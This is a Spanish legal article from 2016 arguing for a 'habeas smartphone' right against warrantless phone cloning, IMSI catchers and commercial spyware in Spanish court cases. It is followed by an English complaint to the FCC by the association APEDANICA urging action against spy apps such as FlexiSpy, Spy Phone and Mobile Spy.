el smartphone presente» siendo «hábeās» la segunda persona singular del presente de subjuntivo del verbo latino «habēre» (en este caso entendido como «tener»). Es clara la analogía con el “HABEAS DATA” que entre otras fuentes, se trata en https://es.wikipedia.org/wiki/Habeas_data


compleja problemática cambiante y probablemente irrepetible, como el río en el que Heráclito filosofaba que nadie puede bañarse dos veces, porque nunca es el mismo. En efecto, es inimaginable que se repita alguna vez un caso como el que toda España conoce por el apodo, mote o sobrenombre de su primer protagonista, el “pequeño Nicolás” en cuyas diligencias procesales14 constan, al menos, tres incidentes muy relevantes y diferenciables para cuanto aquí se entiende y propone como “habeas smartphone”. Probablemente existan otras muchas perversiones de smartphones en procedimientos judiciales, pero la variedad y el enredo policial del caso “pequeño Nicolás” es difícilmente igualable, ni siquiera asemejable, al de ningún otro conocido en España hasta ahora. El primero es el clonado de un iPhone 5 sin orden judicial, utilizando la policía el sistema israelí Cellebrite15 mediante el cual se vuelca a disco duro y luego a DVDs que constan en el juzgado todo cuanto pudo extraerse del teléfono del detenido, pero sin orden judicial alguna. El clonado de móviles a detenidos en comisarías sin orden judicial motivó una actuación de la Defensora del Pueblo16 que concluyó recomendando al Ministerio del Interior que el teléfono móvil de los detenidos no fuera clonado sin orden judicial. El segundo es el uso de antenas falsas de telefonía para vigilar, monitorizar e intervenir el teléfono del Pequeño Nicolás pero también toda la celda delimitada por las estaciones base de la red celular afectando a todo el vecindario de la casa de su abuela (en zona residencial militar y probablemente afectando a cientos de usuarios de telefonía) sin orden judicial17. El uso de antenas falsas para la intervención policial masiva de teléfonos smartphones en toda una celda es un problema ya “reconocido”, o para mayor precisión, ya se ha conseguido documentar18 en EEUU mediante la Ley de Libertad de Información (Freedom of Information Act) y se ha planteado como problemática mundial abierta para las Naciones Unidas19. El tercero es el uso ilegal de aplicaciones espía o software troyano malware nada menos que en el iPhone 5 del entonces Comisario de Asuntos Internos del Cuerpo Nacional de Policía CNP, Marcelino Martín­Blas, cuyas conversaciones con miembros del Centro

14

Juzgado de Instrucción 2 de Madrid , Diligencias Previas 4676/14 inicialmente contra Francisco Nicolás Gómez Iglesias, pero sobre la que se han abierto piezas separadas que afectan al Comisario de Asuntos Internos y a buena parte de la cúpula policial y Ministerio del Interior de España. 15 Para información y referencias de los productos para clonado y análisis de smartphones puede verse http://www.cita.es/cellebrite 16 http://www.cita.es/defensora­del­pueblo 17 Véase la querella por el uso de antena falsa (IMSI catcher o StingRay) que ni se ha admitido ni tampoco inadmitido, ignorándose pasado más de año y medio en http://www.cita.es/querella­ai ampliada en http://www.cita.es/ampliando­ai y reiterada en http://www.cita.es/reitera­ai 18 The New York Times “N ew York Police Are Using Covert Cellphone Trackers, Civil Liberties Group Says “ by JOSEPH GOLDSTEIN FEB. 11, 2016 http://www.nytimes.com/2016/02/12/nyregion/new­york­police­dept­cellphone­tracking­stingrays.html?_r=0 19

El escrito dirigido al Dr. Zeid Ra'ad Al Hussein Alto Comisionado de Naciones Unidas para los Derechos Humanos (ACNUDH) en carta abierta por hiperenlaces relevantes en www.cita.es/zeid y www.miguelgallardo.es/zeid.pdf curiosamente acabó en los archivos de HackingTeam publicados por Wikileaks en https://wikileaks.org/hackingteam/emails/emailid/279187


Nacional de Inteligencia CNI fueron intervenidas y grabadas ilegalmente20. El Centro Criptológico Nacional CCN del CNI emitió informes supuestamente periciales pero nada concluyentes ni útiles para probar la intrusión a efectos judiciales. Lo más extraño y sospechoso es que el mismo modelo de Apple iPhone ha sido y sigue siendo utilizado por altos cargos y funcionarios públicos, así como por diputados, y nada garantiza que la misma intrusión mediante malware no pueda seguir utilizándose y nadie haya exigido las más básicas responsabilidades, al menos informativas, a la empresa Apple en España21. Las aplicaciones (apps) para espiar smartphones forman parte de una perversa industria que se esconde en paraísos fiscales. Cualquiera puede comprar, o para mayor precisión, obtener ilimitadas licencias de programas para espiar smartphones como FLEXISPY ­ Spy

Phone ­ Mobile Spy o MSPY y otros que, ni siquiera cuando se ha evidenciado su uso, la investigación judicial avanza eficazmente. No hay ni una sola referencia a ninguno de esos programas en la jurisprudencia española mínimamente relevante hasta ahora22. Las “spy apps” publicitadas hacen la más descarada apología del delito de descubrimiento y revelación de secretos en los ámbitos más íntimos. Parece como si la más mínima sospecha de infidelidad legitimase para intervenir el smartphone de la pareja, y que cualquier indicio de deslealtad laboral permitiera a cualquier patrón espiar a todos sus empleados, impunemente. Desde el 20 de abril de 2016 está pendiente de resolución una doble denuncia23, por audiovisuales y datos espiados sistemáticamente con sofisticados productos como los mencionados F LEXISPY ­ Spy Phone ­ Mobile Spy ­ MSPY ante la Federal Communications Commissions FCC de Estados Unidos y también ante varias autoridades para la privacidad de países europeos, sin constancia de actuación alguna. Los riesgos, daños y perjuicios relacionados con los smartphones en los procedimientos judiciales no se limitan a las acciones o resoluciones del juez, porque también tiene ua enorme responsabilidad el secretario judicial SJ, que ahora ha cambiado el nombre en España para llamarse letrados de la Administración de Justicia LAJ, como fedatario judicial funcionario público garante de la integridad y autenticidad de todos los documentos, cualquiera que sea su formato. El smartphone no deja de ser un documento en sí mismo, por muy complejo o hipercomplejo que pueda resultar, y es el SJ ­ LAJ quien debe garantizar no solamente que se investiga eficazmente lo que se debe investigar y que nadie accede a ningún dato, metadato, audio o vídeo sin legitimación y autorización para ello, sino también la disponibilidad de un auténtico medio de vida, pero también un elemento esencial 20

Por esas grabaciones a agentes secretos el juzgado abrió la pieza separada en la que el fiscal puso de manifiesto la gravedad de los hechos y las dificultades para su investigación en un informe que se comenta y se publica íntegro en http://www.cita.es/juzgado­iphone.pdf 21 Véase el escrito dirigido a APPLE MARKETING IBERIA SA y APPLE RETAIL SPAIN SL Atn.Luis Jonathan Ortiz Finnemore en http://www.cita.es/espionaje­iphone.pdf 22 Lo que sí existe es una lentísima actuación del JUZGADO DE INSTRUCCIÓN 11 DE MADRID en las Diligencias previas 3034/2013 por descubrimiento de secretos que denunció la ex concejal NOELIA MARTINEZ ESPINOSA contra el actual diputado autonómico y senador JOSE CARMELO CEPEDA GARCIA (que no consta que haya sido citado ni como investigado) sobre las que hay datos y referencias en http://www.cita.es/flexispy­providencia.pdf y http://www.cita.es/querella­flexispy 23 F CC tickets (#905143) y (#905169) en w ww.cita.es/fcc­complaint y también en formato PDF con firma criptográfica certificada en http://www.miguelgallardo.es/fcc­complaint.pdf


para la defensa de un creciente número de investigados actualmente en los juzgados de todo el mundo, e incluso antes, cuando son detenidos sin conocimiento judicial alguno. En este sentido, resulta particularmente indignante que un juez requise docenas de teléfonos smartphones, tabletas, ordenadores personales y sistemas informáticos empresariales, en todo caso, de propiedad privada, y que pasen muchos meses, y en ocasiones varios años, sin que sean devueltos a sus propietarios, más aún cuando son investigados como se pretende llamar ahora en España a imputados, denunciados o querellados en cualquier fase de la instrucción judicial. En definitiva, es preocupante que los juzgados de instrucción acumulen smartphones y otros sistemas durante demasiado tiempo dejando en indefensión a quien necesita sus propios datos y metadatos en el medio de comunicación que es de su propiedad. Es probable que la jurisprudencia solamente avance por autos y sentencias que anulen procedimientos en los que no se ha respetado el derecho que puede derivarse del “habeas smartphone”, simplemente, porque no se le ha devuelto a su propietario. En algún caso los abogados se han quejado cada vez más duramente, y en otros, es el smartphone de un abogado investigado el que puede crear problemáticas judiciales extremas24. Eso no significa que los smartphones de los abogados merezcan, por sí mismos, una especial consideración, sino que es la condición de abogado de un afectado, y precisamente por ese afectado, por lo que merecen especial protección. La criminalidad de los abogados es compleja y difícil de investigar, pero sus privilegios no pueden impedir la instrucción judicial. Si un abogado, además de ser abogado, es narcotraficante o defraudador, o comete cualquier otro delito que no afecte a la defensa de un cliente concreto, no puede ampararse en su condición de abogado para protegerse, por lo que el “habeas smartphone” de un abogado no debería proteger al abogado en sí mismo, sino solamente a los derechos de sus defendidos respecto a los datos que pudieran obtenerse de su smartphone. En esos conflictivos casos, el necesario “expurgo judicial” es fundamental, porque no todas las partes de un procedimiento tienen por qué tener acceso a todas las evidencias electrónicas que se encuentren en un smartphone. Lo que sí es cierto es que el propietario sí, y pronto, pero el resto, muy limitadamente, no inmediatamente, y siempre tras un responsable y prudente “expurgo judicial” de sus contenidos. El abogado ejerciente no solamente tiene los límites que marca el Código Penal. Tiene también obligaciones deontológicas o morales más allá de sus propios perjuicios o riesgos. Si un abogado no puede garantizar la seguridad de las comunicaciones con su cliente, o al menos, que si se han espiado no se investiga eficazmente ese espionaje, los derechos fundamentales de todos sin excepción corren serio peligro, especialmente el derecho fundamental de no verse obligado a hacer declaraciones autoinculpatorias y derecho al silencio relacionado con el privilegiado derecho al secreto de las comunicaciones entre

24

Claros ejemplos de todo ello puede encontrarse en la llamada Operación Púnica cuyos autos 85/2014 del JUZGADO CENTRAL DE INSTRUCCION 6 de la Audiencia Nacional evidencian que varios investigados llevan más de un año sin poder disponer de sus propios smartphones porque no se han podido clonar pese a disponerse en la Policía Judicial de sistemas como el descrito en www.cita.es/cellebrite y w ww.miguelgallardo.es/cellebrite.pdf


abogado y cliente25 cuya violación puede tener consecuencias tan graves como la condena penal y la inhabilitación del juez26 que ordene la intervención de esas comunicaciones. El “habeas smartphone”, así como el ya más aceptado habeas data o el menos conocido habeas audio y habeas video, precisa un nuevo planteamiento garantista, en todos los sistemas judiciales del mundo, porque el smartphone del abogado puede ser intervenido de las maneras más sutiles e indetectables que puedan imaginarse. Pero las mismas garantías merece el smartphone del periodista que debe proteger a sus fuentes. Numerosos periodistas son objeto de investigaciones policiales, con o sin orden judicial, en las que sus smartphones y registros (metadatos) de llamadas entrantes y salientes entregadas sin autorización ni consentimiento ni siquiera con su conocimiento, señalando así a sus fuentes lo que pone en riesgo el derecho a dar y recibir información veraz27. Finalmente, los smartphones en los juzgados son también un claro indicador de ciertas problemáticas mucho más generales. Los peritajes judiciales, siempre discutibles desde el primer momento que una parte, o el mismo juez, se plantean consultar a un experto, hasta la última cita o uso sin cita que se haga de los servicios profesionales, condicionan y en muchos casos limitan o imposibilitan que pueda alcanzarse verdad, justicia y reparación. Pocas veces el Poder Judicial se ha tomado en serio a los peritos, y los jueces dejan en manos de secretarios judiciales ahora LAJs o incluso de los funcionarios meros gestores de los procedimientos la designación, nada menos, que del experto a consultar. El resultado es una historiografía de muy lamentables peritajes judiciales sobre diversos smartphones. Más allá de cualquier normativa siempre mejorable y actualizable, el imperativo categórico de Kant28 y la lógica deóntica29 de los “preferidores” racionales o blochianos30 pueden ser muy útiles para la Filosofía Moral o Ética del descubrimiento y la revelación de secretos en smarphones, que, con toda seguridad, aportará buenas preguntas pero malas conclusiones. 25

El secreto entre abogado y cliente siempre debe ser absoluto o, al menos, el más garantista posible muy especialmente en materia penal en todos los ordenamientos jurídicos mínimamente garantistas ( SUPREME COURT OF CANADA ­ 13 Feb. 2015 Docket 35399 Att.y General v. Federation of Law Societies of Canada et al) https://scc­csc.lexum.com/scc­csc/scc­csc/en/item/14639/index.do 26 Tribunal Supremo de España STS 79/2012, de 9 de febrero de 2012. Sentencia del caso 'Peláez, Crespo y Correa vs. Garzón' por prevaricación judicial con violación de las garantías constitucionales publicada con comentarios sobre la condena del ex juez Baltasar Garzón en http://www.poderjudicial.es/cgpj/es/Poder_Judicial/Tribunal_Supremo/Noticias_Judiciales/Tribunal_Su premo__Sentencia_del_caso__Pelaez__Crespo_y_Correa_vs__Garzon__por_prevaricacion_judicial _con_violacion_de_las_garantias_constitucionales 27 APEDANICA se ha preocupado por varios incidentes que afectan a la seguridad de periodistas y sus fuentes en gravísimos casos de corrupción que afectan al Poder Judicial y Ministerio del Interior desde una perspectiva internacional. Véanse los escritos dirigidos a la Federación de Periodistas de América Latina y el Caribe FEPALC en www.cita.es/apedanica­fepalc.pdf Reporteros sin Fronteras RSF en www.cita.es/apedanica­rsf.pdf y en inglés a ICIJ en www.cita.es/apedanica­icij.pdf 28 Sobre el imperativo categórico https://es.wikipedia.org/wiki/Imperativo_categ%C3%B3rico 29 Deontic Logic G. H. von Wright Mind, New Series, Vol. 60, No. 237. (Jan., 1951), pp. 1­15. en http://www.wnswz.strony.ug.edu.pl/von%20wright,%20deontic%20logic.pdf 30 Manuel de Ética, Amelia Valcárcel, pág. 121 "¿ Son morales las leyes del mundo? " disponible en http://www.ipesad.edu.mx/repositorio1/BG­B05­7.pdf.pdf A Ernst Bloch se le conoce y reconoce como el filósofo de las “utopías concretas”, de las ensoñaciones, de las esperanzas. Falta hacen.


Conclusiones, obviamente muy provisionales y relativas: 1º Se sabe muy poco de lo que realmente ocurre o no ocurre y debiera ocurrir ante/con/en/para/por los smartphones, desde una rigurosa perspectiva jurídica y moral, tanto en sedes judiciales, como en comisarías de Policía o en los ámbitos industriales y tecnológicos o en el laboral y deontológico, o en las efervescentes redes sociales y menos aún en el familiar o personal más íntimo. 2º Con toda seguridad, en pocos años se desarrollará el derecho en toda su creciente complejidad y en ese futuro, se llame como se llame, el concepto de “habeas smartphone” pretende definir, dividir categorizando y argumentar jurídicamente sobre un nuevo escenario social condicionado por un pequeño aparato cada vez más sofisticado que se integra en hipercomplejas redes que mezclan la problemática telefónica con la de Internet, explosivamente en todo el mundo. Probablemente sean autos y sentencias con nulidad de actuaciones las que hagan valer el “habeas smartphone”, pero antes, las pericias y los peritos deben proponerse con rigor y seriedad poco frecuentes hasta ahora. 3º Ese derecho no puede ser limitado por el ordenamiento jurídico de un único país, sino que estructuras supranacionales como la Unión Europea UE y la Organización de las Naciones Unidas ONU deben preocuparse y más aún, ocuparse seriamente de lo que ocurre y de lo que va a ocurrir con smartphones y sus hipercomplejas redes. Y hará falta mucha Filosofía para todo ello.

Artículo para enviar antes del 10 de agosto de 2016 a Diego Mauricio Montoya Vacadíez Director Revista Derecho Penal Contemporáneo LEGIS Editores. remitido por Dr. e Ing. M iguel Gallardo , criptólogo y perito judicial privado en España y Avv. A chille Campagna , abogado y notario ejerciente en San Marino / Italia ambos en representación de la Asociación para la Prevención y Estudio de Delitos, Abusos y Negligencias en Informática y Comunicaciones Avanzadas ( APEDANICA ) entidad sin ánimo de lucro constituida en España en 1992 con Tel. (+34) 902998352 y E­mail: apedanica.ong@gmail.com La versión definitiva, una vez publicada por la editorial que nos ha invitado, quedará también disponible en www.cita.es/habeas­smartphone.pdf Quedan reservados todos los derechos. © 2016 APEDANICA www.cita.es/apedanica.pdf


ENTIDAD ASOC PARA LA PREVENCION ESTUDIO DELITOS ABUSOS NEGLIGENCIAS EN INFORMATICA - CIF G80593254 - NOMBRE GALLARDO ORTIZ MIGUEL ANGEL - NIF 07212602D

Firmado digitalmente por ENTIDAD ASOC PARA LA PREVENCION ESTUDIO DELITOS ABUSOS NEGLIGENCIAS EN INFORMATICA - CIF G80593254 - NOMBRE GALLARDO ORTIZ MIGUEL ANGEL - NIF 07212602D Nombre de reconocimiento (DN): c=ES, o=FNMT, ou=FNMT Clase 2 CA, ou=703015345, cn=ENTIDAD ASOC PARA LA PREVENCION ESTUDIO DELITOS ABUSOS NEGLIGENCIAS EN INFORMATICA - CIF G80593254 - NOMBRE GALLARDO ORTIZ MIGUEL ANGEL - NIF 07212602D Fecha: 2016.04.11 14:49:52 +02'00'

Dr. (PhD) Miguel Á. Gallardo , Tel. +34 902998352 Fax: +34 902998379 apedanica.org@gmail.com

To the Federal Communications Commission (FCC) w ww.cita.es/fcc­complaint

I am a legal representative of Spanish association APEDANICA (Asociación para la Prevención y Estudio de Delitos, Abusos y Negligencias en Informática y Comunicaciones Avanzadas). APEDANICA already had the pleasure to enter into contact before with William Knowles­Kellett, Attorney, Investigations and Hearings Division, Enforcement Bureau, Federal Communications Commission FCC for FOIA Request 2016­018 (Google massive wireless espionage). Now we can offer relevant additional official information with the certificate at www.cita.es/apedanica.pdf and Comisión Nacional de Mercados y Competencia CNMC (“FCC like” in Spain) published at https://rgi.cnmc.es/gruposdeinteres/apedanica­asociacion­para­la­prevencion­y­estudio­de­delitos­abusos­y­negligencias APEDANICA now ask for FCC attention to some very dangerous and maybe criminal oriented products as we explain (in Spanish) with several links that you and everybody can see at Hiperenlaces en www.cita.es/flexispy y w ww.miguelgallardo.es/flexispy.pdf Hiperenlaces en www.cita.es/spy­phone y w ww.miguelgallardo.es/spy­phone.pdf Hiperenlaces en www.cita.es/mobile­spy y w ww.miguelgallardo.es/mobile­spy.pdf As far as we know, after very careful search in FCC.GOV at the moment there is no reference of Spy Phone , Mobile Spy o r FLEXISPY . However, it is possible to read about one of them at https://www.us­cert.gov/sites/default/files/publications/TIP10­105­01.pdf FlexiSpy is commercial spyware sold for up to $349.00 per year. Versions are available that work on most of the major smartphones, including Blackberry, Windows Mobile, iPhone, and Symbian­based devices. The following are some of the capabilities provided by the software: Listen to actual phone calls as they happen; Secretly read Short Message Service (SMS) texts, call logs, and emails; Listen to the phone surroundings (use as remote bugging device); View phone GPS location; Forward all email events to another inbox; Remotely control all phone functions via SMS; Accept or reject communication based on predetermined lists; and Evade detection during operation. FlexiSpy claims to help protect children and catch cheating spouses, but the implications of this type of software are far more serious. Imagine a stranger listening to every conversation, viewing every email and text message sent and received, or tracking an individual’s every movement without his or her knowledge. FlexiSpy requires physical access to a target phone for installation; however, these same capabilities could be maliciously exploited by malware unknowingly installed by a mobile user. In the same document we are learning about other products like “Ikee.B” reading this: A recent and more nefarious example of mobile malware is the Ikee.B, the first iPhone worm created with distinct financial motivation. It searches for and forwards financially sensitive information stored on iPhones and attempts to coordinate the infected iPhones via a botnet command and control server.5 5 F­Secure. Worm:iPhoneOS/Ikee.B. 2009. Retrieved February 16, 2010 from http://www.f This worm only infects iPhones that have 1


a secure shell (SSH) application installed to allow remote access to the device, have the root password configured as “alpine”—the factory default—and are “jailbroken.” A jailbroken iPhone is one that has been configured to allow users to install applications that are not officially distributed by Apple. Although Ikee.B has limited growth potential, it provides a proof of concept that hackers can migrate the functionality typical to PC­based botnets to mobile devices. For example, a victim iPhone in Australia can be hacked from another iPhone located in Hungary and forced to exfiltrate its user’s private data to a Lithuanian command and control server. Ikee.B seems to be just a malware virus but Spy Phone , Mobile Spy or FLEXISPY are commercial products just for espionage purposes that anybody can buy with no control or restriction anywhere just paying with a credit card or paypal. All of them are improving the espionage performance and may develop hidden functionalities beyond advertised ones. There are also very serious Police testimonies about FLEXISPY for instance at https://www.judiciary.senate.gov/imo/media/doc/06­04­14HillTestimony.pdf The Testimony of Detective Brian Hill Criminal Investigations Division Anoka County Sheriff’s Office For the Hearing of the Senate Judiciary Committee Subcommittee on Privacy, Technology and the Law United States Senate Location Privacy Protection Act of 2014 June 4, 2014… I worked with a victim a couple years ago where she suspected that her estranged boyfriend must have put some type of spyware on her phone. She stated that he would know things about private conversations that she had over the phone and in text messages. Also he would show up randomly at locations where she was. I did an exam of her phone and was unable to get a full data extraction off of the phone and unable to determine if there was any spyware. Later, she brought in her computer for me to look at and I was able to find that the program FlexiSPY was accessed on the computer. I was then able to show that the program was installed on her phone and was able to work with her to get a new phone and set up new email accounts on a safe computer.... After stealth cyberstalking has begun, regaining safety is a difficult and expensive process for victims. On top of the trauma of surviving domestic abuse, victims are economically and socially impacted. They often must buy new phones, computers, and other technological equipment to be rid of the stealth stalking apps – although there are never any guarantees. Additionally, as we all become more accustomed to using our phones to work, bank, text, email, access social media, search the internet, and pay bills, stealth cyberstalking not only financially impacts victims, but can serve as a tool to isolate victims from all of the functions and social connections their phones provide – including isolating them from being able to reach out to domestic violence advocates or law enforcement. If victims want to be rid of stealth stalking apps they must create new email accounts and change all passwords and security questions – although, again, there are never any guarantees. It is terrifying for victims to know that they will never really know if the stealth stalking apps are gone or if they will reappear after being removed. This means victims’ privacy and peace of mind continue to be violated, often long after they have bought new phones or changed their passwords. 2


In Spain, FLEXISPY has been found in a Nokia smartphone now in a Criminal Court (Juzgado de Instrucción 11 de Madrid) and we have shown our expert witnessing interest as published at www.cita.es/flexispy­juzgado a nd w ww.miguelgallardo.es/flexispy­juzgado.pdf APEDANICA is looking for information and jurisprudence in any country and in any language about commercial products that can perform illegal task like Spy Phone , Mobile Spy or FLEXISPY .are already offering. Nobody seems to limit anyhow or to control what is sold just for mobile espionage purposes on ANDROID and APPLE IPHONE and other SMARTPHONES. APEDANICA believes that the advertising information and references that can be found at www. flexispy .com www. spyphone .com and www. mobile ­ spy .com i amounts to a guilty plea for conspiracy to commit mobile smartphones espionage in order to initiate debarment proceedings by FCC and European Data Privacy authorities and rulemaking against smartphones espionage using uncontrolled commercial products as an illegal business if no FCC rules are enough to limit and control it in the United States of America and abroad.. APEDANICA is aware that it is not easy to contact Spy Phone , Mobile Spy or FLEXISPY legal representatives. The best way we suggested already to a Criminal Court of Law in Spain is to use the “website whois” information. FLEXISPY Internet server seems to be in Victoria, Mahe Seychelles, Mobile Spy in Jacksonville FL and Spy Phone in Wayne, NJ but it is not possible to find any legal representative in Spain or in any other European country, as far as we know. APEDANICA shall be pleased to do our best co­operating with FCC attorneys in order to evidence malware as well as illegal business on any commercial product used for espionage. APEDANICA request documented information about any FCC investigation on Spy Phone , Mobile Spy or FLEXISPY as well as any other commercial product that can perform the same kind of espionage under Freedom of Information Act ( FOIA ) as soon as possible. This complaint can be forwarded to any authority in any country and we keep this published at www.cita.es/fcc­complaint a nd w ww.miguelgallardo.es/fcc­complaint.pdf (with digital sign)

Dr. (PhD) Miguel Á. Gallardo , Tel. +34 902998352 Fax: +34 902998379 apedanica.org@gmail.com Asociación APEDANICA C/ Fernando Poo 16­6ºB E­28045 Madrid, SPAIN (ESPAÑA) https://rgi.cnmc.es/gruposdeinteres/apedanica­asociacion­para­la­prevencion­y­estudio­de­delitos­abusos­y­negligencias

www.cita.es/apedanica.pdf https://goo.gl/za0Aps

3


Turn static files into dynamic content formats.

Create a flipbook
Issuu converts static files into: digital portfolios, online yearbooks, online catalogs, digital photo albums and more. Sign up and create your flipbook.